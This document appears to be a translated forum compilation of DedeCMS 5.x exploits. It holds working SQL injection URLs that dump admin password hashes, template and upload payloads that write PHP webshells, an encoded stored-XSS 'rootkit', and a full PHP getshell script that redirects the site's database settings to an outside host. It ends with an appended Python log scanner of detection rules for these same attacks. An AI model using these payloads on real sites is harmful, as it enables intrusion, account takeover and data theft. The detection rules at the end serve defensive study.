Dedecms 5.6 RSS injection vulnerability
http://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
DedeCms v5.6 embedded malicious code execution vulnerability
Register as a member and upload a software item; in the local address field enter a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}
After publishing, viewing or editing the item executes the code.
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
This generates x.php with password xiao, a one-line shell written directly.
Dede 5.6 GBK SQL injection vulnerability
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
http://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
http://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
DEDECMS all versions gotopage variable XSS vulnerability
1. Copy and paste the URL below into the browser; this triggers the XSS and installs the XSS rootkit. Note that IE8/9 and similar browsers block URL-based XSS, so the XSS filter has to be turned off.
http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2. Close the browser; from then on, visiting any of the URLs below in any way triggers our XSS.
http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda
http://v57.demo.dedecms.com/dede/login.php
DeDeCMS (织梦) variable-overwrite getshell

#!/usr/bin/php
<?php
// Variable-overwrite exploit script as posted; only the forum garbling has been
// stripped and comments added. Usage: php <script> host aid path
error_reporting(E_ERROR);
set_time_limit(0);
print_r('
DEDEcms Variable Coverage
Exploit Author: www.heixiaozi.com www.webvul.com
');
echo "\r\n";
// Three arguments are required: host, aid (selects the shell directory) and the install path
if(!isset($argv[3])){
print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' url aid path
aid=1 shellpath=/data/cache   aid=2 shellpath=/   aid=3 shellpath=/plus/
Example:
php '.$argv[0].' www.site.com 1 old
+---------------------------------------------------------------------------+
');
exit;
}
$url=$argv[1];
$aid=$argv[2];
$path=$argv[3];
$exp=Getshell($url,$aid,$path);
// Getshell() returns only the first response line (the HTTP status line), so "OK" at
// offset 13 of "HTTP/1.1 200 OK" is what this check actually sees
if (strpos($exp,"OK")>12){
echo "\nExploit Success \n";
if($aid==1)echo "\nShell:".$url."/$path/data/cache/fuck.php\n";
if($aid==2)echo "\nShell:".$url."/$path/fuck.php\n";
if($aid==3)echo "\nShell:".$url."/$path/plus/fuck.php\n";
}else{
echo "\nExploit Failed \n";
}
function Getshell($url,$aid,$path){
$id=$aid;
$host=$url;
$port="80";
// POST body: doaction points mytag_js.php at itself, and the _COOKIE[GLOBALS][cfg_db*]
// fields overwrite the site's database connection settings (register_globals-style)
$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";
$data .= "Host: ".$host."\r\n";
$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";
//$data .= "Accept-Encoding: gzip,deflate\r\n";
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";
$data .= "Connection: keep-alive\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";
$data .= $content."\r\n";
$ock=fsockopen($host,$port);
if (!$ock) {
echo "\nNo response from ".$host."\n";
return '';
}
fwrite($ock,$data);
while (!feof($ock)) {
$exp=fgets($ock, 1024);
return $exp; // returns after the first line; see the note at the call site
}
}
?>
DedeCms v5.6-5.7 unauthorized access vulnerability (straight into the admin backend)
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
Change validate=dcug above to the current captcha value and you go straight into the site backend.
This vulnerability requires obtaining the backend path first.
Dedecms (织梦) tag remote file write vulnerability
Prerequisite: you must have your own dede database ready, then insert the row: insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');
Then submit with the form below; the shell is 1.php in the same directory. Work out the principle yourself...
<form action="" method="post" name="QuickSearch" id="QuickSearch">
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
<input type="text" value="true" name="nocache" style="width:400">
<input type="submit" value="提交" name="QuickSearchBtn"><br />
</form>
<script>
function addaction()
{
document.QuickSearch.action=document.QuickSearch.doaction.value;
}
</script>
Dedecms <= V5.6 Final template execution vulnerability
1. Register a user, enter the member backend, publish an article and upload an image, then in attachment management replace the image with our crafted template. For example the image name is:
uploads/userup/2/12OMX04-15A.jpg
The template content is (prepend gif89a if the image format is restricted):
{dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}
2. Edit the article just published, view the page source and build a form:
<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1275972263" />

<div id="mainCp">
<h3 class="meTitle"><strong>修改文章</strong></h3>

<div class="postForm">
<label>标题:</label>
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>

<label>标签TAG:</label>
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)

<label>作者:</label>
<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>

<label>隶属栏目:</label>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>测试栏目</option>
</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)

<label>我的分类:</label>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>hahahha</option>
</select>

<label>信息摘要:</label>
<textarea name="description" id="description">1111111</textarea>
(内容的简要说明)

<label>缩略图:</label>
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>

<input type='text' name='templet'
value="../uploads/userup/2/12OMX04-15A.jpg">
<input type='text' name='dede_addonfields'
value="templet,htmltext;">(this is the crafted part)
</div>

<!-- form action area -->
<h3 class="meTitle">详细内容</h3>

<div class="contentShow postForm">
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>

<label>验证码:</label>
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />
<img src="http://127.0.0.1/dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />

<button class="button2" type="submit">提交</button>
<button class="button2 ml10" type="reset">重置</button>
</div>

</div>

</form>
Submit; if it reports that the edit succeeded, the template path has been changed.
3. Visit the edited article:
Assuming the aid of the article just edited is 2, we only need to visit:
http://127.0.0.1/dede/plus/view.php?aid=2
and the webshell 1.php is generated in the plus directory.
DEDECMS website management system Get Shell vulnerability (5.3/5.6)
Gif89a{dede:field name='toby57' runphp='yes'}
phpinfo();
{/dede:field}
Save as 1.gif
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="aid" value="7" />
<input type="hidden" name="mediatype" value="1" />
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /><br />
<input type="hidden" name="dopost" value="save" />
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
<input name="addonfile" type="file" id="addonfile"/>
<button class="button2" type="submit" >更改</button>
</form>
Build the form above; after upload the image is saved as /uploads/userup/3/1.gif
Publish an article, then build the edit form as follows:
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
<input type="hidden" name="dopost" value="save" />
<input type="hidden" name="aid" value="2" />
<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
<input type="hidden" name="channelid" value="1" />
<input type="hidden" name="oldlitpic" value="" />
<input type="hidden" name="sortrank" value="1282049150" />
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/>
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/>
<select name='typeid' size='1'>
<option value='1' class='option3' selected=''>Test</option>
</select>
<select name='mtypesid' size='1'>
<option value='0' selected>请选择分类...</option>
<option value='1' class='option3' selected>aa</option></select>
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
<input type='hidden' name='dede_addonfields' value="templet">
<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
<button class="button2" type="submit">提交</button>
</form>
织梦 (Dedecms) V5.6 remote file deletion vulnerability
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
织梦 (Dedecms) V5.6 plus/carbuyaction.php local file inclusion vulnerability
http://www.test.com/plus/carbuya ... urn&code=../../
DedeCms V5.6 plus/advancedsearch.php arbitrary SQL statement execution vulnerability
plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`
The stored password is the 32-character MD5 with the first 5 and the last 7 characters removed, leaving a 20-character MD5 value; to convert it, remove 3 more from the front and 1 from the end to get the 16-character MD5.
织梦 (Dedecms) 5.1 feedback_js.php injection vulnerability
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
织梦 (Dedecms) select_soft_post.php uninitialized page variable vulnerability
<html>
<head>
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
</head>
<body style="FONT-SIZE: 9pt">
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />
<form action='http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php' method='POST' enctype="multipart/form-data" name='myform'>
<input type='hidden' name='activepath' value='/data/cache/' />
<input type='hidden' name='cfg_basedir' value='../../' />
<input type='hidden' name='cfg_imgtype' value='php' />
<input type='hidden' name='cfg_not_allowall' value='txt' />
<input type='hidden' name='cfg_softtype' value='php' />
<input type='hidden' name='cfg_mediatype' value='php' />
<input type='hidden' name='f' value='form1.enclosure' />
<input type='hidden' name='job' value='upload' />
<input type='hidden' name='newname' value='fly.php' />
Select U Shell <input type='file' name='uploadfile' size='25' />
<input type='submit' name='sb1' value='确定' />
</form>
<br />It's just a exp for the bug of Dedecms V55...<br />
Need register_globals = on...<br />
Fun the game,get a webshell at /data/cache/fly.php...<br />
</body>
</html>
织梦 (dedecms) 5.3 - 5.5 plus/digg_frame.php injection vulnerability
It exploits an error raised by numeric overflow of a MySQL field, together with DEDECMS recording database error messages into a PHP file whose file header is not validated.
1. Visit the URL:
http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
An error message is shown.
2. Visit http://www.abc.com/data/mysql_error_trace.php; seeing the following output proves the injection succeeded.
int(3) Error: Illegal double '1024e1024' value found during parsing
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
3. Run the file test.html from dede.rar; note that the form's action address is
<form action="http://www.abc.com/data/mysql_error_trace.php" enctype="application/x-www-form-urlencoded" method="post">
After clicking OK, seeing the output from step 2 means the trojan file was uploaded successfully.
织梦 (DedeCms) plus/infosearch.php file injection vulnerability
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*
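As an added defensive example (not part of the original post), a Python scanner that flags the request shapes listed above in combined-format access logs: the _POST/_COOKIE[GLOBALS] variable overwrite, advancedsearch.php sql=, the gotopage XSS, the edit_face.php deletion traversal, and the updatexml/union injections. The log lines, client IPs and rule names are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed combined-format access-log lines (not real traffic) replaying the request
# shapes from this page against a lab host. POST bodies (the mytag_js.php form, the
# article_edit.php template swap) never reach the access log, so those variants need a
# WAF or request-body logging rather than this script.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jun/2011:10:00:01 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jun/2011:10:00:02 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=203.0.113.9&_POST[GLOBALS][cfg_dbuser]=root HTTP/1.1" 200 87 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jun/2011:10:00:03 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Eeval(String.fromCharCode(80,101))%3C/script%3E HTTP/1.1" 200 1440 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jun/2011:10:00:04 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.5 - - [01/Jun/2011:10:00:05 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20updatexml%281,%28SELECT%201%29,1%29%23'][0]=1 HTTP/1.1" 500 0 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jun/2011:10:00:06 +0800] "GET /plus/view.php?aid=2 HTTP/1.1" 200 9031 "-" "Mozilla/5.0"
"""

# Apache/nginx combined format: client ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# (rule name, pattern applied to the percent-decoded request target)
RULES = [
    # _POST[GLOBALS][cfg_dbhost]= / _COOKIE[GLOBALS][...]: the variable overwrite behind
    # the getshell and login-bypass payloads on this page
    ("globals_overwrite", re.compile(r"_(?:COOKIE|POST|GET|REQUEST)\[GLOBALS\]\[", re.I)),
    # bare cfg_* request variables (cfg_basedir, cfg_imgtype, ... as in select_soft_post.php)
    ("cfg_variable", re.compile(r"(?:^|[?&])cfg_[a-z_]+=", re.I)),
    # advancedsearch.php taking a raw SELECT in its sql= parameter
    ("advancedsearch_sql", re.compile(r"/plus/advancedsearch\.php\?.*?\bsql=\s*select\b", re.I)),
    # error-based (rss.php) and union-based (feedback_js.php, infosearch.php) injection
    ("sql_injection", re.compile(r"updatexml\s*\(|\bunion\s+select\b", re.I)),
    # script tag inside login.php's gotopage parameter
    ("gotopage_xss", re.compile(r"gotopage=[^&]*<\s*script", re.I)),
    # edit_face.php delold with ../ escaping the upload directory
    ("edit_face_traversal", re.compile(r"/member/edit_face\.php\?.*?oldface=[^&]*\.\./", re.I)),
    # carbuyaction.php code= traversal (local file inclusion)
    ("carbuyaction_lfi", re.compile(r"/plus/carbuyaction\.php\?.*?code=[^&]*\.\./", re.I)),
]

def decode_target(target, rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are matched in the clear."""
    for _ in range(rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def scan_line(line):
    """Return (client ip, raw target, [matching rule names]) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    hits = [name for name, rx in RULES if rx.search(decoded)]
    return m.group("ip"), m.group("target"), hits

def scan_log(text):
    """Scan a whole log; keep only parsed lines that triggered at least one rule."""
    findings = []
    for line in text.splitlines():
        result = scan_line(line)
        if result and result[2]:
            findings.append(result)
    return findings

if __name__ == "__main__":
    for ip, target, hits in scan_log(SAMPLE_LOG):
        print(f"{ip}  {','.join(hits)}  {target[:70]}")
```

Alerting on these rules is a starting point only: the mytag_js.php and article_edit.php paths on this page carry their payload in the POST body, which a standard access log never records.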